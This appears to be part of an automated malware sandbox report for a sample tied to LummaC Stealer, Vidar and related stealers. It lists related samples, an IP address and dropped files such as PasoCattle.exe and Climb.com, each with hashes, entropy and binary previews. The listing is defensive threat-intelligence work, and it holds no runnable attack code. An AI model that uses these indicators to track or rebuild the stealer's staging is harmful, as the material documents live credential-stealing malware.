	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.2.51
	FfcoO2Giru.exe	Get hash	malicious	LummaC	Browse	104.21.2.51

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\768400\Climb.com	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse
	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\768400\Climb.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: j2nLC29vCy.exe, Detection: malicious, Browse Filename: es5qBEFupj.exe, Detection: malicious, Browse Filename: vUcZzNWkKc.exe, Detection: malicious, Browse Filename: CLaYpUL3zw.exe, Detection: malicious, Browse Filename: BagsThroat.exe, Detection: malicious, Browse Filename: installer_1.05_36.4.exe, Detection: malicious, Browse Filename: SoftWare(1).exe, Detection: malicious, Browse Filename: !Setup.exe, Detection: malicious, Browse Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse Filename: JA7cOAGHym.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\768400\V

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	459790
Entropy (8bit):	7.999632331590964
Encrypted:	true
SSDEEP:	12288:P02pW2c56oA+/4hza+MglCQS9z/jgM/UB:w2LNMW6/gM/UB
MD5:	F9D71E9E58748BEEA3554073DCD205C8
SHA1:	0F059E563F46355BCA0866B3D7D0993DA4991C18
SHA-256:	45206C86B0AE3EB38240DD076201BE60B4983BBD0209CAA20516A9E6595C8BBA
SHA-512:	BBC015D43F281AF0D1CC75C3E41E13E09E5D24E9F23DB9FF5B6012E5D8978FD9C6C5C4A08B6262909660C606014BB375DCE1C4C909CA4B2D2CCA39722EBAF1A0
Malicious:	false
Preview:	.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..\|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......\|QT~dB..c..O..$.C...l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...

C:\Users\user\AppData\Local\Temp\Alt

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	5.172930596796904
Encrypted:	false
SSDEEP:	768:sc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVx:/PdKaj6iTcPAsAhxW
MD5:	BE1780E619FC600C90159E321A7BCBB9
SHA1:	C710D9B6E5843AD64355C032D4835707B245170E
SHA-256:	DBA6C4B6BEB02F24A6B4F3C7892605A06A8D99D5F65366C021B1337F1D192852
SHA-512:	F0BB5EB234DD25FBB7D7107839CBC9E72CBD1E269CA5F4445E245CBAC4CD8E6DD8966BB4DB08C0B0C88AB22E4A78E46CC3323E201E31E15E0E6E9D82C416D0ED
Malicious:	false
Preview:	................................................................................................................................................................................................b........\... ... \|....................................................................L...........I.....................................................................................0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F................?......Y@.....@.@......P?...........................(#...pqrstuvwxyz{$--%"!' .&,[\.....`abcdefghijkmno]......_..................................................................................................................................................1L..2L..2L..2L.$2L.42L.@2L.H2L.T2L.\2L.l2L.t2L.\|2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..3L..3L. 3L.,3L.43L.<3L.T3L.`3L.l3L..3L...J..3L..3L..3L..3L..3L..3L..3L..4L..4L.$4L.44L.D4L.T4L.l4L..4L..4L..4L..4L..4L..4L..4L..4L..4L..5L...J..5L.45L.P5L.p5L..5L..5L..5L..5L..6L.$6L.<6L.P6L.h6L..6L..6L..6L..6L

C:\Users\user\AppData\Local\Temp\Articles

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	268
Entropy (8bit):	4.968398681802287
Encrypted:	false
SSDEEP:	6:1qjvVg3F+X32+hZCt7HSbYwClS6CSNEcixNU:1yGSG+fCtJfjEvq
MD5:	41B7CDB6E286EE0E44962C8987B91D3C
SHA1:	E57E0B12ABC823CB91D3ACFA32AD63230405057D
SHA-256:	43F8E40249EC2FC185FDC323451FB72384EC9FF5910BD927C89CE8C41CACB58B
SHA-512:	B4423FD2C9D40D3715F93C6E130AF4B81CAA0B3BB3D23AF542D7043E6B91CAB1CCDDDBD2ECE8656736E4A3C594BAD99436432F4BD2EA2EA133FF381DCB8248CA
Malicious:	false
Preview:	cocks........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..

C:\Users\user\AppData\Local\Temp\Attractions

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	141312
Entropy (8bit):	6.686197497967684
Encrypted:	false
SSDEEP:	3072:fEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2uI:sMVIPPL/sZ7HS3zcNPj0nEo3tb2j
MD5:	2ED9FFBA1FEA63AD6D178AEA296ED891
SHA1:	E0D1BB0AF918F8DDEE3FB3D593CAF0FC52C77709
SHA-256:	21B6E909F647CC2B1ADB6945ACEDA0EE2CB3DF2C91641D7609FFAB2DB6A40FA1
SHA-512:	52524AD966A8D72BB53ECBA0AC5EE5DC0DB6BE0569CC0E7E0C2D03B5266465C5162AD1048AD1B827E3BDCF985D0932E19336C2D5179BCD7E655E87BABB421055
Malicious:	false
Preview:	.U...........tB.E..M.}.G.}..H.E.;}.\|..%.......t.;.....v..Fh.............RY...}..}.........E...@..P.u.V.u..u............V.......;E...&....}..t.f.......f#......f;.u.....E...@..P.u.V.u..u..G........t............}......F\|.M.+..........C.........M.f9C...........]..e.....C.......%..........E.............U.......8....E...%....=....u".M................%.....M..........E.;.U...C.]........U..........L.............M.,K......K...;.............K......f;.w..F<.....E.............f;.w..F<.....E.;..............E..]..j.....C......E.U.......E.......C.3.U.E..(t..U...5u..E...........~3..E.........U...d......E.........U...N3..E.........U..E........;................+.....U.....+K.....+K..U.E..u..E......}......E..E...y...%.....E......]..E......E.....=....u<..C..].%...........E...........E............E.......]..E....E.}...]..Y.]..........r;.}.........L..............M.,K......K...;.t..U.......U....3..}..E...............E....M.F\|.}.+.;.w.Q.u.W.6n.......u..M.....E..?.E......<.....

C:\Users\user\AppData\Local\Temp\Beaches

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	62464
Entropy (8bit):	7.997732291588885
Encrypted:	true
SSDEEP:	1536:OC2t1VFGBsTxn/fkC+a+kem/B7BKtrFhBzd6g/4k:OC2j+u/CXoJ7ctrfxn/h
MD5:	50CB864F887F934B80CC62A6BB08D611
SHA1:	C23F38262D04019CF198D4499DD95945FE078EC4
SHA-256:	B2F79588B9EC05A7520F42382EA47F596AEB82A83AA4BF3426DB5AA64ABF877A
SHA-512:	9F68238A297F61C48380CE6867AFB929A231AB88CA836E00400B182F3CF5EED99E69B38A60CBFA578FFBF50D5C3326A6E8ECEFDF719FA8FBB99F1FC4C799E283
Malicious:	false
Preview:	.3.\|...zit..ct.]!....).1o......>4...?c._...3...bd..t.[(FiSi._...2.%...".....!P...c.Y ..k...\O.k..i..}...r&..r.........Y.hTy4...n."....4..=T......A.{...b<_.4./..+g.(.g.WK..)s..........js..y.i.Y.q8.\..<.6.........S......!..hP..<.f.\|\|.Y..d:8...i.i.T.'5..g.U..B..%..O....fg.v.8.Cp.W....(..3...J?. P$O...:u.Q....K.m.....N.b.A.e.M.7...{. C6U..(<_6y.QV....?..4...^.~.....A4.....U<..^....Y..n}.Y..h.).....Y#u...Y>.u.O.v....:..#..0......$KN.j.gK.(.x4......50.X....*m......\Od.K.}CN....n/."w(.Ru.6...6..\y}.{..w./..U...,&......`<..<....X:@$Ea.....4.....P..>........F..t<.M1C....`..F7EE.....A.m.W.......19.".?H...Q.....0.!K.).W..U.J=h}J... .n..L&5D....'F- s.e...v...@...'.Iwv.IcHPH..w..?..9.5#..C..I0.a.,.D.b.\|....~........\|9..........3....l_........B`G.UH..I.E......z&..t.M........E.,.&.[..Y..l.G...Ll..W>.3.i..B...S..8V.:\W.............$.c+@-..N/hd.YH.M..8L...WC..IX...?...?!k.F.b.....CLN..C.\..........J....i.....o...o..e.Y.....K..UL.]....K.v...y..e..:..X#.m.

C:\Users\user\AppData\Local\Temp\Cooked

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	6.612657669946948
Encrypted:	false
SSDEEP:	1536:FC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmES6:AhVOoQ7t8T6pUkBJR8CThpmES6
MD5:	A5CA22529355B052CBCCB045EC8172A1
SHA1:	12F5D5871B07A1EABB9B57753432FC59680830D2
SHA-256:	E434C2A8351E6517F35FFA6D38542390AD0A905BC23FAC64E7D61680AE7CEB67
SHA-512:	AF9D158F1590FB96C1FB7DD1635FE9D1D7528FC3349068363F169907411EE488E2BF6AC03CE851189DBF24FDED3504A574FFF51B5CE6D41E06D8AB9360FC099E
Malicious:	false
Preview:	.E........E.Pj.V.u..E.........I...tV.E.....uM.U..$.........@..@.......t.........$........................t........3.@...3..3..Y3._^[....U...4.M..V.u...u..M...)M...3.@....W...t....tz...t....t..E...)M.PV.i.....t].}........t+M...tK.x..tEj,.E..E.0...j.P.X......E......E.P...t+M.j.V.0....I...t..M..E...3.@..3._^....U..U..E......y..........t...=....}.........t.....2.]...U......L.M.SVW.[s..P.L$$.s...L$..3.u..\|$ .....................t&...t!.D$...)M.PV.p............]..t$..T.......t....u/f9..<M.u.h.)M........f9..,M.u.h.)M...W.W...3.9..t+M...z...f9...q......t+M.h.....D$...2..YP.L$...r..3..D$(0...j,P.D$4P.AW...D$$....D$L.D$(.D$,.....D$P....P3.P.D$.V.0....I..........D$0...........D$4%.....D$...y&3.f9.......W...D$0.....\|$P..\|..Y.D$P.L.D$4..@t......y.......t........t..........t.......D$4.t...u.....D$,.....D$4.D$(P3.P.D$.V.0....I...t3..~*......t.3.PV...\|$..t.3.Pj..D$..0....I...t.3.C..3...D$..(.u.j.P.0...t$ ..0.......3..L$$.).u.j.Q.0..W..0....._^..[..]...U..Q.M...E.P.u...)M..Z.....t,.E

C:\Users\user\AppData\Local\Temp\Enrolled

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	83982
Entropy (8bit):	7.99794941439563
Encrypted:	true
SSDEEP:	1536:SL5dqhmZ4lVzAf9EFl407V6Lf4wXM3wmosIAUZ8DYZyxSr1Pum:WqU2zOmFl40RwfdM3Ros/URcxgmm
MD5:	B0830E2CE03D5BC821D5136F5D8B4D5E
SHA1:	99840A43C60501C4F1F0151EE11798C7FA395591
SHA-256:	D5916524E70C85211005E2E7851E8250BF46ADD8C28FD501DB4BCFBE9EE1ADEE
SHA-512:	58F230B27771DA357658231E2E7445E7D13239CDB0D10D4CD5FA81267DF6EA4883C23139CE41F4892E64B6EE3CD67176C52375E9710823133B7CE20D0EB62934
Malicious:	false
Preview:	...U.,..l..I.E.l./@..8......%...i.\w6TJ....Vr...s.Y7"u......T......Z.f..Cv.X...th.....N..Ao.."C..K...(....1;WL...7..59...z..C-+..OD.N.7@.}.]......z;......^.w.2ee(.4.....FS....;B...0.#......f.r8...Y...ao.)../..0......;..ANl...f..m.=[].K.FQ4n...,........5?......E,..o../.}B..<.........te.._..s..}......._-...&.nOj..........[..p.[....CD..',...r.})e..!...K.?.x.SK.fs.{.u..E3V..8.."...^L.)J....:.................[1.........\|.p......Ou.n....+...P...}.&C..!..,.V.P...#..v.P..P..6.....F....I..8...Q...gP)V@..U.......S.wG..k'5>..i`...KH...\ ..y....................ql...x.....&....o..=...V.H.=W.....LO..#...._H..t.....0..;.&Ie...?.z...@....s......2$r.Am..).A..J...U.5,.(M..._...]h..0...{....1..G....R...L.u....M.....:.q..%.!O....q.\|.:....xy....w"N.c..y.t....Y.).-...T#...2=.nB.dM.M...+.p.....M....1_..M...k..Wp.e......M.J.5w].........R.P......(....Z.}b.K...\|...vZ.V.p..........D9........t...k.....ge.m.rVj..;..m;D..P.rR..`'5..9.LXY........d.RJ+..)

C:\Users\user\AppData\Local\Temp\Fingers

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	119633
Entropy (8bit):	6.0874087589267925
Encrypted:	false
SSDEEP:	1536:sgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:sgarB/5elDWy4ZNoGmROL7F1G7ho2kOb
MD5:	7D6337C50FA5EB0681D5B094E58E3541
SHA1:	BD1A7A54D4F4382AACA1FFAF4A690799CA6081F7
SHA-256:	791C72AEB0CAF7FC14F0420F053C0698D27D68265810762470307EA489568780
SHA-512:	A24F3EADC814C87F2D592F64467CC0894347ADE35924507E81719104C0B9F293A76A51D92B5329CB57574B6EE65C71ED1BBE30D61BE041E1AE522ADDE617912F
Malicious:	false
Preview:	.KillTimer.7.PostQuitMessage...SetFocus....MoveWindow....DefWindowProcW....MessageBoxW...GetUserObjectSecurity.-.OpenWindowStationW..h.GetProcessWindowStation...SetProcessWindowStation.(.OpenDesktopW..N.CloseWindowStation..J.CloseDesktop....SetUserObjectSecurity...GetWindowRect.6.PostMessageW....MapVirtualKeyW..&.GetDlgCtrlID..d.GetParent...GetClassNameW.;.CharUpperBuffW....EnumChildWindows..{.SendMessageTimeoutW.m.ScreenToClient....GetWindowTextW..,.GetFocus....AttachThreadInput...GetWindowThreadProcessId..!.GetDC.e.ReleaseDC...GetWindowLongW....InvalidateRect....EnableWindow....IsWindowVisible...IsWindowEnabled...IsWindow..#.GetDesktopWindow....EnumWindows...DestroyWindow.K.GetMenu...GetClientRect...BeginPaint....EndPaint..U.CopyRect....SetWindowTextW..'.GetDlgItem..s.SendDlgItemMessageW...EndDialog...MessageBeep...DialogBoxParamW...LoadStringW.!.VkKeyScanW..=.GetKeyState.B.GetKeyboardState....SetKeyboardState....GetAsyncKeyState..v.SendInput.0.keybd_event...SystemParametersInfoW...F

C:\Users\user\AppData\Local\Temp\Maternity

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.997035686695416
Encrypted:	true
SSDEEP:	1536:F5ORWtjA85b/PQW6wzxYtMbs8VKKXsgN1yFi3eb7:Op85T6tIDVKKXZMoeb7
MD5:	BF1A63801FCE643D91670984E50AA26C
SHA1:	96CC6E514ED73B0F0816884E6019F3F3C31F6A80
SHA-256:	96E885D5F09D9B01BBBB20C5DA4005E84683F65EE061EB2D22F41DA96A1A48A0
SHA-512:	D741447E64E376442A4FBEE480A94C494219292BB70DF6A346C5244C12F647BDC074F13F53A0FC32202C1D8D6A37C7BAA9CC0E750020492B99781D9CEEE3F943
Malicious:	false
Preview:	.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..\|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......\|QT~dB..c..O..$.C...l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...

C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Download File

Process:	C:\Users\user\Desktop\TNyOrM6mIM.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1062983
Entropy (8bit):	7.969270980145046
Encrypted:	false
SSDEEP:	12288:00giFMExCeGp6bA+2lC/S9zD0upW2+IHxb7A8G5jMVTn1Xx1MwT6/OkwyR4UzU+J:/ieH66juI80CT1DMa4LwxIM9HM/U1OK
MD5:	A3E9A86D6EDE94C3C71D1F7EEA537766
SHA1:	DDFBF23CBA3ADC0BCAD33162D1BDBEE8CCD12294
SHA-256:	A7B3B6CA09E92530EF0BD156B0C2C0213E957129BFB83B8A99D2387932BB2CA5
SHA-512:	AF6391847FF626FF88FF0583ADDE9536EFF25026ACBC0D0165CE27286A8F145CBB0B5059A294D7A14CB497C60B96E9A5DE88D41A3EE6A339FDB554DE51790F0C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.................................t.....@.................................@..........."u..............8+...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc..."u.......v..................@..@.reloc............... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Pot

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	133120
Entropy (8bit):	6.593902201612224
Encrypted:	false
SSDEEP:	3072:2+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9cob:2mVnjphfhnvO5bLezWWt/Dd314V14Zgz
MD5:	998B4B6FEEE76BEB9CA721DCD2B8A4E0
SHA1:	6556CA455B7F7B3B36F5A703746B17D2D662F82B
SHA-256:	A3718216E2D86886D768FDE1FE869B9F84FA96309ADC8D83CAF1F17B939F76BF
SHA-512:	A8E92A0CF4CA465313BFE27D860F956F3777B3202A8B1FDFB03DB4AAAD567F3546C525F40D85414D04806D964B650637846FD1F7CCA6736B8C8E327B342C3617
Malicious:	false
Preview:	.~..v..F..H..u....N.P...j...P......u......k1...>3._.F.....^]...U..E.VW.@..H..0.2...P...*...P.\....u......+1...>3._.F.....^]...U..V.u....W.~..v..F..H.......V.P.J..2.....P.......P.....u.......0...>3._.F.....^]...U....SVW.}.3.]..]..]..w....r!.G.j).H..M.......u......M.A......r..G.j).H.......u..W....E....r..O.j).I..k.....u..9....O.....E..I..(.....$..E..G..p....G....u..F..u..u....G.SQ.......P.x....u......./...>3._.F.....^[....U..M.3.9A.v..A....q..VWP......u....../...>3._.F.....^]...U.....e..SVW.}.........j...j.S.X....E.....x..v..@....Mq.....E..M.Q.M.Q.M.Q.M.Q.M.QP.............E.3..e..Fj..E.E.VPS.u..........M..#/...E.3.V.E.E.VPS.}.u..........M.......E.j..E.E.VPS.}.u.........M.......E.j..E.E.VPS.}.u.........M......E.j..E.E.VPS.}.u..].......M......8.......'.3.B.W....H..\|1...D1.t..@8.P..\|1...D1.t..@8.@.._^3.[....U........=.(M..SVW.L$.uA...@..\|....T..t..R83.C.Z..\|....T..t..R8.u....B.......3..^..>.Q.....(M..0....M.3..C.\|$..y..v..I.......;.u.....2.....!............M..

C:\Users\user\AppData\Local\Temp\Promise

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	7.9975626227798315
Encrypted:	true
SSDEEP:	1536:cQ36ddIs69BLJSqA8PWfAx/lruBD5hf6akJGg1lg+xM4Zl:cQlF9oAjrO4G+a+xMyl
MD5:	832042466014761981CDAF193F0E7041
SHA1:	301225CDE7E7DE3A10E98D7C9DE191D85AAC0099
SHA-256:	FF5E35AC52EA87EC94D3847112D9F3083B3BF252FA74C76D453EE118BA1A2BE8
SHA-512:	2A49ECD5DE8702A71267463B8CD130F1AA91D1E3F8D9EB866B8C58C8FC46374F98AECDCDCD071D207F734A61D082AAA56170152EEDA3C0E445C0A5CCD6A50260
Malicious:	false
Preview:	..2O;.....=F.u...~X.^tu4ey?...v............E=.....U..x...'...=.g.....=..".......C-..}...8...8.Br..g]....M.-.>.r,...I.......!.5..f.4...FV.U.,.%zY...~.ysqV..V...I...?...)..zRsa...#.G..C.pqe.b{.:%k.y...)..Y..-<.n.J/<gkN..m.\.L.I.VIC q.rc..YMn%<....O.......4.....J..C,s..U.{N.z.pAU..dX...M.7.$1...a..&..\|89...}).g...F.e.p.....&..P..t.0......64.$)...K..f2.!.P.P...A...~..G..!.M.f.f..._...i..U.<..@9 .....2.FN.`....fT..#[...\9.0.kO.S.^A.....K:.....a.AES2...ps$.8F5... UF......(.X=Ha............s.rb.._f.A...q....#.....M..T...qj:...$0Y...P...r..o..].m.f.>.1_\|.p76.........a..6.>G.a.....c...]u+.$....v. 3[-e...D.kw. ..Y.O.a.BsW....E...bw`..Y.7>...<......e.....a..E...Vy..#u3..A.YW......~......w.-P..)S..4.J...k..JZ.\.HR..V...y....q..jB..@.G@-..Q5."[.&A.J!....F.'J4..>.......< ........@..c5/K.y.....S......?.3.Q...2M........?~....GQ0.k8.{5[.P\WY..7....k.wc.JA.k..77"^a.n...I.#....J.M..p!....t=z..?W .Iqi...b..!PDv...)3.....;,#.uH2...X....+..<.G;hM......$.Npr.e....\|.

C:\Users\user\AppData\Local\Temp\Rat

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.9982884825197775
Encrypted:	true
SSDEEP:	1536:qIl7/T+lGxZhNlCtHtyAtgvWscqQlxaDOgASCZ5FSJqz7D6qAK8KxGBpM:xZL33R0HtyA+RQlKOmxw/D8KxGBpM
MD5:	CD00C53F92FBED3C8947B7205A4247ED
SHA1:	87D5486B7EFD98DCC92B4393D20D39D12CB6487E
SHA-256:	EDD50131DA69EA2747D0BCA3ECD4293778BEB5491FBF02BF6D4ADA4B2E9F01C1
SHA-512:	D1C7AAD1E7F376C7622031D36A3C1F2452B693E5FA976B35CFC22045180388B55218FA8C2B0270C2F66C996B805112C6D82F312642809D9051F350AE1220A85E
Malicious:	false
Preview:	..t!@xF.....U...-p.....)..1^....Y.....w...z..(.....b.$\X..2..#.....6c..@...\.E$R.u....Z.]..<`..v...9.a.W..N?=...6..d._......9.~.5~.....Jd...~0h'.............bf.6....Q.I........J.U.d......I...\.'J..m..).n.,S.../................$.j.....,L.-....`s2..2...V........U.6.\./U~...y...K..2.i.z...l.k.EQ..+.=.....E]T.\Y.?.C..'.m...hP.'.M..mc....:}.e6-^.g..$...o.k.b]!@...Vl.,.e.O.....9S.?..MA......\|...U?].....D..f....D=....za.Nf......46.I......>..../T(6...L..B..Y.8.3B..J.[S..@........%..^..e$.ck......b.h.....Y.$:.K_p}c.;i..C.}..O.D \|.&...f\|n.......yq....#\|..B..T..F....t..R~)d)<.N.0......tp.9..~Co.....W.n.(1.).y...%_.......Y....D(..b....>..)^....dGX..iA.9...n.H8...pn...D...\.......a5.t\<1.N..=.......v..e.q.M.W..]....a.-7~*BO.k..j...\|3.}_2jz.A3.X.-3(.fN\.4.>J......yG...om......f....v..uCP...+g...i.IU{R..Be8.....o5...=...k.n`(..m..w..S.9.@..l.ri...U?..ctD+...+S...u.e;..G.G.=3S,.S.......q....M.U/z.>..y..k....e..J&4$.z.....[B..J.Ax0..!]fr....M..Ry

C:\Users\user\AppData\Local\Temp\Receiver

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	5.844749716437728
Encrypted:	false
SSDEEP:	1536:xj62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwug:xjfTq8QLeAg0Fuz08XvBNbjaAtg
MD5:	7A1D29A789B8F5CA0F4186AA1DBC3BC2
SHA1:	A9A3169FF90FA2BFFB8D96F95FFDB3A70386B476
SHA-256:	A513073A8C2E7F41CF78374498C2D980CD8DA473246AF5475C53C1D7FA7BA0DE
SHA-512:	AD90D9521F68AFFDA3AD4CCA4ECF1A72C3CFCB465F3D60FB8BCB02FFACD3ABD9F1DBF03C022F13FC68DA74080355CE36C0B13D4E511E0857AF60C30B2032D3A0
Malicious:	false
Preview:	..F.. r.^].U..QS.].V.u..U..C.W....Cx.<H....b....}....0....{P.........w.E.;........C\|......E.;...(.....2.....%....=....u....#....#....................%....=....u....#....#.....................L..............M.,K.;.t-.....K...;.t ......K....@.K...;..........;.u......E.;}...F...+U......u..~.+.N;S\|sa........E.=....w..C<.]......]..].......w..C<....9M.u1.........~..[\|N;.s.............f;.u......j.X....._^[..U..QQSV.u...M.W..xQ;u.}L.D..+..E....E....P.......Y..u.j..+...E..u...HQW.R...E....3.f..8.M..E..9..j.X_^[..U....SVW....3.B.....#.M.......sQ.......u%f..u....L.............j..T>.X....3...f..t...........T8.t..E.........j.Y..".t... ...f...........E......}..E......U.3.E.B.......f;.u<....}..t&%....=....u.........#.#..............;...........j.Xf;..........}..tZ..%....j.[=....u.........#.#....................%....=....u"............%....................;.r.;...r...3.B...j.Yf....'....E._^[..E......L.....E....E.,K..E.3.f;].....E..E.....2....$...I.j.Xf;..........K.<.......<....

C:\Users\user\AppData\Local\Temp\Reflect

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	Microsoft Cabinet archive data, 488808 bytes, 9 files, at 0x2c +A "Cooked" +A "Receiver", ID 6076, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488808
Entropy (8bit):	7.998475465922649
Encrypted:	true
SSDEEP:	12288:ohQLaKCeh787wflZffn5DMrTn1GF1MwTYcOkxFdryB:PaenflZ1iT1CMaLLxFde
MD5:	97942C5C8DFF98863EFC71FC15CE0257
SHA1:	14D6BA8E5C3B7BE1BE540CA7ECAA075D5C505E3B
SHA-256:	B4A2CBEAA8185681ED75BDF2C34020CCAA9405A42A47C4C3D17EC6E907FD9152
SHA-512:	7D1FABB306D3CD38985CE6472DF17973AEE7F4D56902D48A1CF690BBAF8D5BA71D83DD79136FCA635AB51813FC3978E9871DECAD0E07D46BEE5A998E5CB77D6F
Malicious:	false
